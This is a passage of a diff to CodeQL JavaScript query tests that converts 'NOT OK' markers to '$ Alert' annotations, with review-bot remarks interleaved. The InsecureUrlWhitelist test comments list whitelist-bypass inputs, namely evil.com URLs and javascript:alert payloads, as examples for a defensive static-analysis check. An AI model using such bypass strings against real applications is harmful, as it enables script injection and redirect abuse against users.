Alert - but only one error + .run(function($provide){}) // OK - special case + .run(function(providerId2Provider){}) // $ Alert - .config(function(factoryId){}) // NOT OK - .config(function(serviceId){}) // NOT OK - .config(function(valueId){}) // NOT OK - .config(function(constantId){}) // OK - .config(function(providerId){}) // NOT OK - .config(function($http){}) // NOT OK - .config(function($provider){}) // OK - .config(function($scope){}) // NOT OK - .config(function($compile){}) // OK - .config(function(UNKNOWN){}) // OK - .config(function(providerIdProvider){}) // OK - .config(function(providerId, UNKNOWN){}) // NOT OK, but only one error - .config(function($provide){}) // OK (special case) - .config(function(valueId2){}) // NOT OK + .config(function(factoryId){}) // $ Alert + .config(function(serviceId){}) // $ Alert + .config(function(valueId){}) // $ Alert + .config(function(constantId){}) + .config(function(providerId){}) // $ Alert + .config(function($http){}) // $ Alert + .config(function($provider){}) + .config(function($scope){}) // $ Alert + .config(function($compile){}) + .config(function(UNKNOWN){}) + .config(function(providerIdProvider){}) + .config(function(providerId, UNKNOWN){}) // $ Alert - but only one error + .config(function($provide){}) // OK - special case + .config(function(valueId2){}) // $ Alert // service: same restrcitions as .factory - .service('s14', function(factoryId){}) // OK - .service('s15', function($provider){}) // NOT OK + .service('s14', function(factoryId){}) + .service('s15', function($provider){}) // $ Alert ; diff --git a/javascript/ql/test/query-tests/AngularJS/InsecureUrlWhitelist/tst.js b/javascript/ql/test/query-tests/AngularJS/InsecureUrlWhitelist/tst.js index 713e36e52233..6ede37fed7cc 100644 --- a/javascript/ql/test/query-tests/AngularJS/InsecureUrlWhitelist/tst.js +++ b/javascript/ql/test/query-tests/AngularJS/InsecureUrlWhitelist/tst.js 
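Review bot: The context comment `// service: same restrcitions as .factory` above the two `.service(...)` lines misspells "restrictions"; since every marker in this block is being rewritten anyway, `// service: same restrictions as .factory` is a cheap fix. Separately, the `$ Alert - but only one error` markers on the `providerIdProvider, UNKNOWN` lines in the controller, factory, run and config sections express an expectation about alert count in free text; if the harness does not distinguish one result from two on the same line, that expectation is not enforced, which is worth confirming so the comment does not promise more than the test checks.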
@@ -1,24 +1,24 @@ angular.module('myApp', []) .config(function($sceDelegateProvider) { $sceDelegateProvider.resourceUrlWhitelist([ - "**://example.com/*", // BAD (exploit: http://evil.com/?ignore=://example.org/a or javascript:alert(1);://example.org/a) - "*://example.org/*", // BAD (exploit: javascript://example.org/a%0A%0Dalert(1) using a linebreak to end the comment starting with "//"!) - "https://**.example.com/*", // BAD (exploit: https://evil.com/?ignore=://example.com/a) - "https://example.**", // BAD (exploit: https://example.evil.com or http://example.:foo@evil.com) - "https://example.*", // BAD (exploit: https://example.UnexpectedTLD) + "**://example.com/*", // $ Alert - (exploit: http://evil.com/?ignore=://example.org/a or javascript:alert(1);://example.org/a) + "*://example.org/*", // $ Alert - (exploit: javascript://example.org/a%0A%0Dalert(1) using a linebreak to end the comment starting with "//"!) + "https://**.example.com/*", // $ Alert - exploit: https://evil.com/?ignore=://example.com/a + "https://example.**", // $ Alert - exploit: https://example.evil.com or http://example.:foo@evil.com + "https://example.*", // $ Alert - exploit: https://example.UnexpectedTLD - "https://example.com", // OK - "https://example.com/**", // OK - "https://example.com/*", // OK - "https://example.com/foo/*", // OK - "https://example.com/foo/**", // OK - "https://example.com/foo/*/bar", // OK - "https://example.com/foo/**/bar", // OK - "https://example.com/?**", // OK - "https://example.com/?**://example.com", // OK + "https://example.com", + "https://example.com/**", + "https://example.com/*", + "https://example.com/foo/*", + "https://example.com/foo/**", + "https://example.com/foo/*/bar", + "https://example.com/foo/**/bar", + "https://example.com/?**", + "https://example.com/?**://example.com", "https://*.example.com", // not flagged: - /http:\/\/www.example.org/g // BAD (exploit http://wwwaexample.org (dots are not escaped)) + /http:\/\/www.example.org/g // $ Alert 
- (exploit http://wwwaexample.org (dots are not escaped)) ]); }); diff --git a/javascript/ql/test/query-tests/AngularJS/MissingExplicitInjection/missing-explicit-injection.js b/javascript/ql/test/query-tests/AngularJS/MissingExplicitInjection/missing-explicit-injection.js index 65d3e74ceef0..629b62d5b08e 100644 --- a/javascript/ql/test/query-tests/AngularJS/MissingExplicitInjection/missing-explicit-injection.js +++ b/javascript/ql/test/query-tests/AngularJS/MissingExplicitInjection/missing-explicit-injection.js @@ -1,27 +1,27 @@ (function(){ - function injected1(name){} // NOT OK + function injected1(name){} // $ Alert angular.module('app1').controller('controller1', injected1); - function injected2(name){} // OK + function injected2(name){} injected2.$inject = ['name']; angular.module('app2').controller('controller2', injected2); - function injected3(name){} // OK + function injected3(name){} angular.module('app3').controller('controller3', ['name', injected3]); - angular.module('app4').controller('controller4', function(){}); // OK + angular.module('app4').controller('controller4', function(){}); - angular.module('app5').controller('controller5', function(name){}); // NOT OK + angular.module('app5').controller('controller5', function(name){}); // $ Alert - function injected6(){} // OK + function injected6(){} angular.module('app6').controller('controller6', injected6); - function notInjected7(name){} // OK + function notInjected7(name){} var obj7 = { controller: notInjected7 }; - function injected8(name){} // OK (false negative: we do not track through properties) + function injected8(name){} // OK - false negative: we do not track through properties var obj8 = { controller: injected8 }; 
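Review bot: The `$ Alert` markers in the `resourceUrlWhitelist` array use two shapes for the same annotation: the first two entries and the trailing regex keep the old parentheses, `// $ Alert - (exploit: …)`, while the three middle entries use `// $ Alert - exploit: …`. Pick one form; dropping the parentheses on the remaining three lines matches the rest of the commit. The text after `- ` is documentary only, so the harness does not care, but a reader scanning for the pattern does. This note also covers the first MissingExplicitInjection hunk, which needs nothing further.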
@@ -29,14 +29,14 @@ var $injector = angular.injector(); - function injected9(name){} // NOT OK + function injected9(name){} // $ Alert $injector.invoke(injected9) - function injected10(name){} // OK + function injected10(name){} injected10.$inject = ['name']; $injector.invoke(injected10) - function injected11(name){} // OK + function injected11(name){} $injector.invoke(['name', injected11]) })(); diff --git a/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/repeated-injection.js b/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/repeated-injection.js index 942a9ab1239e..9987e60d0ea5 100644 --- a/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/repeated-injection.js +++ b/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/repeated-injection.js 
@@ -1,36 +1,36 @@ (function(){ - function $Injected1(name){} // OK + function $Injected1(name){} $Injected1.$inject = ['name']; angular.module('app1').controller('controller1', $Injected1); - function $Injected2(name){} // NOT OK + function $Injected2(name){} // $ Alert $Injected2.$inject = ['name']; angular.module('app2').controller('controller2', ['name', $Injected2]); - function $Injected3(name){} // NOT OK + function $Injected3(name){} // $ Alert $Injected3.$inject = ['name']; $Injected3.$inject = ['name']; angular.module('app3').controller('controller3', $Injected3); - function not$Injected4(name){} // OK + function not$Injected4(name){} angular.module('app4').controller('controller4', not$Injected4); - function not$Injected5(name){} // OK + function not$Injected5(name){} angular.module('app5').controller('controller5', ['name', not$Injected5]); - function $Injected6(name){} // OK (because it never becomes registered) + function $Injected6(name){} // OK - because it never becomes registered $Injected6.$inject = ['name']; $Injected6.$inject = ['name']; - function not$Injected7(name){} // OK + function not$Injected7(name){} angular.module('app7').controller('controller7', ['name', not$Injected7]); angular.module('app7').controller('controller7', ['name', not$Injected7]); angular.module('app7').controller('controller7', not$Injected7); - angular.module('app8').controller('controller8', function inline8(name){}); // OK + angular.module('app8').controller('controller8', function inline8(name){}); - angular.module('app9').controller('controller9', ['name', function inline9(name){}]); // OK + angular.module('app9').controller('controller9', ['name', function inline9(name){}]); - function $Injected10(name){ // NOT OK (alert formatting for multi-line function) + function $Injected10(name){ // $ Alert - alert formatting for multi-line function } $Injected10.$inject = ['name']; angular.module('app10').controller('controller10', ['name', $Injected10]); 
diff --git a/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/unused-angular-dependency.js b/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/unused-angular-dependency.js
index f35cc62947ed..14e94d23d6d8 100644
--- a/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/unused-angular-dependency.js
+++ b/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/unused-angular-dependency.js
@@ -1,28 +1,28 @@ (function(){ - function f1(used2, unused5) {used2;} // OK (suppressed by js/unused-parameter) + function f1(used2, unused5) {used2;} // OK - suppressed by js/unused-parameter // this function avoid suppression from js/unused-parameter by explicitly targeting one its weaknesses - function f2(unused7, used3) {used3;} // NOT OK + function f2(unused7, used3) {used3;} // $ Alert this.f2 = f2; angular.module('app1', []) .run(function() {}) - .run(function(unused1) {}) // OK (suppressed by js/unused-parameter) - .run(function(unused2, unused3) {}) // OK (suppressed by js/unused-parameter) - .run(function(used1, unused4) {used1;}) // OK (suppressed by js/unused-parameter) + .run(function(unused1) {}) // OK - suppressed by js/unused-parameter + .run(function(unused2, unused3) {}) // OK - suppressed by js/unused-parameter + .run(function(used1, unused4) {used1;}) // OK - suppressed by js/unused-parameter .run(f1) - .run(["unused6", function() {}]) // NOT OK + .run(["unused6", function() {}]) // $ Alert .run(f2) - .run(["used2", "unused9", function(used2) {}]) // NOT OK - .run(["unused10", "unused11", function() {}]) // NOT OK - .run(["used2", "unused12", function(used2) { // NOT OK (alert formatting for multi-line function) + .run(["used2", "unused9", function(used2) {}]) // $ Alert + .run(["unused10", "unused11", function() {}]) // $ Alert + .run(["used2", "unused12", function(used2) { // $ Alert - alert formatting for multi-line function }]) ; })(); angular.module('app2') .directive('mydirective', function() { return { - link: function (scope, element, attrs) { // OK + link: function (scope, element, attrs) { } }; }); diff --git a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst.html b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst.html index 6e81b0da32a4..d1049d6bf1d9 100644 --- a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst.html +++ b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst.html 
@@ -4,13 +4,12 @@ - - Help + Help - + Help diff --git a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst2.html b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst2.html index 485af478d186..6a4f04ba2e1e 100644 --- a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst2.html +++ b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst2.html @@ -1,4 +1,3 @@
- - Help + Help
diff --git a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst_fragment.html b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst_fragment.html index e461a5d795bc..0111acde5e8a 100644 --- a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst_fragment.html +++ b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst_fragment.html @@ -1,4 +1,3 @@ - - Help + Help diff --git a/javascript/ql/test/query-tests/Comments/TodoComments/tst.js b/javascript/ql/test/query-tests/Comments/TodoComments/tst.js index 877069be03d8..b6497788dd2b 100644 --- a/javascript/ql/test/query-tests/Comments/TodoComments/tst.js +++ b/javascript/ql/test/query-tests/Comments/TodoComments/tst.js @@ -1,2 +1,2 @@ -// OK + // if you want a specific version so specifiy it in object below : version=XXX diff --git a/javascript/ql/test/query-tests/DOM/Alert/alert.js b/javascript/ql/test/query-tests/DOM/Alert/alert.js index 04b0c2e44f2b..dee66a1c186a 100644 --- a/javascript/ql/test/query-tests/DOM/Alert/alert.js +++ b/javascript/ql/test/query-tests/DOM/Alert/alert.js @@ -1,4 +1,4 @@ -alert("hi!"); // NOT OK -x.alert("hi!"); // OK -new alert(); // OK -function alert() { } // OK +alert("hi!"); // $ Alert +x.alert("hi!"); +new alert(); +function alert() { } diff --git a/javascript/ql/test/query-tests/DOM/HTML/tst.js b/javascript/ql/test/query-tests/DOM/HTML/tst.js index df60053b8b93..aec3870ab04d 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/tst.js +++ b/javascript/ql/test/query-tests/DOM/HTML/tst.js @@ -1,25 +1,19 @@ -// OK: we don't know whether the two elements are added to the same document +// OK - we don't know whether the two elements are added to the same document var div1 =
; var div2 =
; -// not OK -Semmle; +Semmle; // $ Alert -// not OK -Semmle; +Semmle; // $ Alert -// not OK -
; +
; // $ Alert
; -// not OK -Semmle; +Semmle; // $ Alert + -// OK
; -// not OK -var div3 =
; +var div3 =
; // $ Alert -// not OK -var div4 =
; +var div4 =
; // $ Alert diff --git a/javascript/ql/test/query-tests/DOM/TargetBlank/tst.js b/javascript/ql/test/query-tests/DOM/TargetBlank/tst.js index 1f1e43ab1550..38ec3b464087 100644 --- a/javascript/ql/test/query-tests/DOM/TargetBlank/tst.js +++ b/javascript/ql/test/query-tests/DOM/TargetBlank/tst.js @@ -1,7 +1,7 @@ function foo() { return "noopener noreferrer"; } var o = { rel: "noopener noreferrer "}; -// OK + Example; Example; Example; @@ -9,42 +9,39 @@ var o = { rel: "noopener noreferrer "}; Example; Example; -// OK, because of constant URL +// OK - because of constant URL Example; Example; Example; -// NOT OK, because of dynamic URL -Example; +Example; // $ Alert - because of dynamic URL Example; Example; function f() { - // OK + var a1 = $("", { href: "http://example.com" }); a1.attr("target", "_blank"); - // OK + var a2 = $("", { href: "http://example.com" }); a2.attr("target", "_blank"); a2.attr(computedName(), "noopener"); - // NOT OK - var a3 = $("", { href: "{{X}}" }); + var a3 = $("", { href: "{{X}}" }); // $ Alert a3.attr("target", "_blank"); - // OK + var a4 = $(""); a4[f()] = g(); a4.attr("target", "_blank"); - // NOT OK - var a5 = $(""); + var a5 = $(""); // $ Alert a5.attr("href", g()); a5.attr("target", "_blank"); } -// OK, because of dynamic URL with fixed host +// OK - because of dynamic URL with fixed host Example; Example; Example; @@ -52,20 +49,20 @@ function f() { Example; Example; -// OK, because of dynamic URL with relative path +// OK - because of dynamic URL with relative path Example; Example; Example; Example; Example; -// OK, Flask application with internal links +// OK - Flask application with internal links Example; Example; Example; -// OK, nunjucks template +// OK - nunjucks template Example; -// OK, Django application with internal links +// OK - Django application with internal links Example 
diff --git a/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/tst.js b/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/tst.js
index c381f60bc272..356f0e111a06 100644
--- a/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/tst.js
+++ b/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/tst.js
@@ -1,10 +1,10 @@
 function f() {
 if (arguments[0].isArray())
- arguments = arguments[0]; // NOT OK
+ arguments = arguments[0]; // $ Alert
 }
 function g(x, y) {
- var arguments = [y, x]; // NOT OK
+ var arguments = [y, x]; // $ Alert
 }
 (function (){
diff --git a/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/types.d.ts b/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/types.d.ts
index d69f8eca109b..855c23cdb118 100644
--- a/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/types.d.ts
+++ b/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/types.d.ts
@@ -1,3 +1,3 @@
-declare function ambientArguments(arguments: string[]): string; // OK
+declare function ambientArguments(arguments: string[]): string;
-declare function ambientArgumentsVarArgs(...arguments: string[]): string; // OK
+declare function ambientArgumentsVarArgs(...arguments: string[]): string;
diff --git a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/classes.js b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/classes.js
index 93bb382719f5..5a8866778884 100644
--- a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/classes.js
+++ b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/classes.js
@@ -1,4 +1,3 @@
 const C = 45;
-// NOT OK
-class C {}
+class C {} // $ Alert
diff --git a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/const6.js b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/const6.js
index 5f022c603b78..3997e1366e7f 100644
--- a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/const6.js
+++ b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/const6.js
@@ -1,4 +1,4 @@
-// OK: `const` is block scoped in ECMAScript 2015
+// OK - `const` is block scoped in ECMAScript 2015
 function f() {
 {
 const val = 1;
diff --git a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/functions.js b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/functions.js
index e23c770f2ad1..130f0278d657 100644
--- a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/functions.js
+++ b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/functions.js
@@ -1,4 +1,3 @@
 const C = 45;
-// NOT OK
-function C() {}
+function C() {} // $ Alert
diff --git a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/other.js b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/other.js
index 929a95754f81..97886fd35f0f 100644
--- a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/other.js
+++ b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/other.js
@@ -1,2 +1,2 @@
-// OK
+
 const s = "there";
\ No newline at end of file
diff --git a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/tst.js b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/tst.js
index c68d2380e017..b53a987d8a4e 100644
--- a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/tst.js
+++ b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/tst.js
@@ -1,23 +1,19 @@
 const x = 23, y = 42;
-// NOT OK
-x = 42;
+x = 42; // $ Alert
-// NOT OK
-y = 23;
+y = 23; // $ Alert
-// NOT OK
-var y = -1;
+var y = -1; // $ Alert
-// NOT OK
-++x;
+++x; // $ Alert
 var z = 56;
-// OK
+
 z = 72;
-// OK
+
 const s = "hi";
 (function (){
diff --git a/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/tst.js b/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/tst.js
index 00ca7e51f7cf..c1060f0280ab 100644
--- a/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/tst.js
+++ b/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/tst.js
@@ -1,12 +1,11 @@
 for (var iter in Iterator(aExtraHeaders)) {
- // NOT OK
- var key = iter[0], key = iter[1];
+ var key = iter[0], key = iter[1]; // $ Alert
 xhr.setRequestHeader(key, value);
 }
-// OK
+
 var tmp = f(), tmp = tmp + 19;
-// OK
+
 var a, b, a = 42;
\ No newline at end of file
diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/tst.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/tst.js
index 6628880d6c55..7f06809d2f3f 100644
--- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/tst.js
+++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/tst.js
@@ -1,31 +1,30 @@
-// NOT OK
-g = 23;
+g = 23; // $ Alert
+
-// OK
 h = 23;
 alert(h);
-// OK
+
 uid = 0;
 function incr() {
 return uid++;
 }
-// OK
+
 function foo() {
 var x;
 x = 0;
 }
-// OK
+
 onload = function() {}
-// OK
+
 global = 42;
-// OK
+
 prop = 42;
-// OK
+
 /*global otherGlobal*/
 otherGlobal = 56;
\ No newline at end of file
diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/computedFieldNames.ts b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/computedFieldNames.ts
index c97993c88a51..3dfc6b0e2e54 100644
--- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/computedFieldNames.ts
+++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/computedFieldNames.ts
@@ -1,11 +1,11 @@
 import dummy from 'dummy';
-var key1 = "key1"; // OK
+var key1 = "key1";
 export class NoConstructor {
 [key1] = 4;
 }
-var key2 = "key2"; // OK
+var key2 = "key2";
 export class WithConstructor {
 [key2] = 4;
diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/computedInterfaceProperty.ts b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/computedInterfaceProperty.ts
index 90199399794d..2f93aba1b9c7 100644
--- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/computedInterfaceProperty.ts
+++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/computedInterfaceProperty.ts
@@ -1,16 +1,16 @@
-import { Foo } from "./exportSymbol" // OK
+import { Foo } from "./exportSymbol"
 export interface FooMap {
- [Foo]: number; // OK
+ [Foo]: number;
 }
-const Bar = "Bar"; // OK
+const Bar = "Bar";
 export interface BarMap {
 [Bar]: number;
 }
-const Baz = "Baz"; // OK
+const Baz = "Baz";
 if (false) {
 Baz;
@@ -18,7 +18,7 @@ if (false) {
 function getBaz(): typeof Baz { return null; }
-class C {} // OK
+class C {}
 if (false) {
 C;
diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/exportDefaultClass.ts b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/exportDefaultClass.ts
index 6481a749c40c..007bf441d6df 100644
--- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/exportDefaultClass.ts
+++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/exportDefaultClass.ts
@@ -1,5 +1,5 @@
-var C1 = global.C1; // OK
-var C2 = global.C2; // OK
+var C1 = global.C1;
+var C2 = global.C2;
 class C extends C1 {}
 export default class extends C2 {}
diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/exportDefaultFunction.ts b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/exportDefaultFunction.ts
index 5c6b48f8796c..c8dba3d68896 100644
--- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/exportDefaultFunction.ts
+++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/exportDefaultFunction.ts
@@ -1,3 +1,3 @@
-var C1 = global.C1; // OK
+var C1 = global.C1;
 export default function(x=C1) {}
diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/extends.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/extends.js
index eab95b4787f6..68b79aac8e68 100644
--- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/extends.js
+++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/extends.js
@@ -1,4 +1,4 @@
-const React = require('react'); // OK: used in `extends` clause below
+const React = require('react'); // OK - used in `extends` clause below
 class Foo extends React.Component {
 }
diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/for-of-continue.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/for-of-continue.js
index da26a3557ade..8e923b565ee2 100644
--- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/for-of-continue.js
+++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/for-of-continue.js
@@ -2,7 +2,7 @@ function f() {
 let y = false;
 for (const x of [1, 2, 3]) {
 if (x > 0) {
- y = true; // OK
+ y = true;
 continue;
 }
 return;
diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/namespace.ts b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/namespace.ts
index 4335cd3880aa..3d00634499f8 100644
--- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/namespace.ts
+++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/namespace.ts
@@ -9,5 +9,5 @@ namespace a.b.q {
 registerSomething(c);
- function foo() {}
+ function foo() {}
 }
diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/overload.ts b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/overload.ts
index d2be60c12874..255c80093466 100644
--- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/overload.ts
+++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/overload.ts
@@ -1,13 +1,13 @@ export function foo() { - function bar(x: number): number; // OK - function bar(x: string): string; // OK - function bar(x: any) { // OK + function bar(x: number): number; + function bar(x: string): string; + function bar(x: any) { return x; } - function baz(x: number): number; // OK - function baz(x: string): string; // OK - function baz(x: any) { // NOT OK, overwritten before use + function baz(x: number): number; + function baz(x: string): string; + function baz(x: any) { // $ Alert - overwritten before use return x; } baz = (x) => x; diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst.js index f19b1656da23..13e260a5de0e 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst.js @@ -1,17 +1,15 @@ function f() { - // OK: initialization to default value + // OK - initialization to default value var x = null, y = undefined, z; x = {}; - // NOT OK - y = 23; + y = 23; // $ Alert y = 42; for (var p in x) y+p; - // OK: assignment to global + // OK - assignment to global global = 42; - // NOT OK - var a = 23; a = 42; - // OK: captured variable + var a = 23; a = 42; // $ Alert + // OK - captured variable var b = 42; return function() { return b%2 @@ -20,14 +18,14 @@ function f() { function g() { var x; - // OK + x = 23, x += 19; - // OK + var y = 42; } function h() { - // OK + var x = false; try { this.mayThrow(); @@ -37,7 +35,7 @@ function h() { } function k(data) { - // OK + for(var i=0;i .5) - // OK + i = 23; } } 
@@ -87,11 +85,11 @@ function s() {
 var container = document.createElement("div"),
 div = document.createElement("div");
 doStuffWith(container, div);
- // OK
+
 container = div = null;
 }
-// OK: the function expression could be made anonymous, but it's not
+// OK - the function expression could be made anonymous, but it's not
 // worth flagging this as a violation
 defineGetter(req, 'subdomains', function subdomains() {
 var hostname = this.hostname;
@@ -103,7 +101,7 @@ defineGetter(req, 'subdomains', function subdomains() {
 return subdomains.slice(offset);
 });
-// OK: assigning default values
+// OK - assigning default values
 function t() {
 var x;
 x = false;
@@ -112,7 +110,7 @@ function t() {
 x = 42;
 return x;
 }
-// OK: unnecessary initialisation as type hint
+// OK - unnecessary initialisation as type hint
 function u() {
 var x;
 x = [];
@@ -120,7 +118,7 @@ function u() {
 x = 42;
 return x;
 }
-// OK: assigning `undefined`
+// OK - assigning `undefined`
 function v() {
 var x;
 x = void 0;
@@ -134,7 +132,7 @@ function v() {
 return x;
 }
-// OK: assignments in dead code not flagged
+// OK - assignments in dead code not flagged
 !function() {
 return;
 var x;
@@ -159,7 +157,7 @@ function v() {
 });
 (function() {
- let [x] = [0], // OK, but flagged due to destructuring limitations
+ let [x] = [0], // $ SPURIOUS: Alert - flagged due to destructuring limitations
 y = 0;
 x = 42;
 y = 87;
diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst2.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst2.js
index 55cff458fca5..0b99d597f477 100644
--- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst2.js
+++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst2.js
@@ -1,5 +1,5 @@
 function outer(b) {
- // OK
+
 let addSubdomain = false;
 if (x) {
@@ -16,14 +16,13 @@ function outer(b) {
 }
 function f(event) {
- // OK
+
 var message = event.data;
 eme.init().then(() => NativeInfo.processApp('install', message.id));
 }
 function g() {
- // NOT OK
- let x = 23;
+ let x = 23; // $ Alert
 {
 x = 42;
 }
diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst3.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst3.js
index 91a09ed03d7d..396ba397e55f 100644
--- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst3.js
+++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst3.js
@@ -1,2 +1 @@
-// NOT OK
-exports = module.exports = { a: 23 };
+exports = module.exports = { a: 23 }; // $ Alert
diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst3b.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst3b.js
index ca9ae499600f..918b117bf273 100644
--- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst3b.js
+++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst3b.js
@@ -1,2 +1 @@
-// NOT OK
-module.exports = exports = { a: 23 };
+module.exports = exports = { a: 23 }; // $ Alert
diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/accessors.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/accessors.js
index 43db65532a09..784cb1ffc328 100644
--- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/accessors.js
+++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/accessors.js
@@ -1,7 +1,7 @@
 class C {
- static get foo() {} // OK
- static set foo(v) {} // OK
+ static get foo() {}
+ static set foo(v) {}
- get bar() {} // OK
- set bar(v) {} // OK
+ get bar() {}
+ set bar(v) {}
 }
diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/exports.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/exports.js
index c4b70604781d..3bd03c882ef8 100644
--- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/exports.js
+++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/exports.js
@@ -1,3 +1,3 @@
 var exports = module.exports;
-exports.answer = "yes"; // NOT OK
+exports.answer = "yes"; // $ Alert
 exports.answer = "no";
diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/fieldInit.ts b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/fieldInit.ts
index a2b922684dda..8be98d94dd00 100644
--- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/fieldInit.ts
+++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/fieldInit.ts
@@ -1,5 +1,5 @@
 class C {
- f; // OK
+ f;
 constructor() {
 this.f = 5;
@@ -7,7 +7,7 @@ class C {
 }
 class D {
- f = 4; // NOT OK
